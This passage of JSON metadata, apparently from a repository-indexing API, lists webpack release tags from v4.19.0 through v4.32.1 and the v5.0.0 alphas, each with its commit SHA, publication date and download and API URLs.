ed_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"n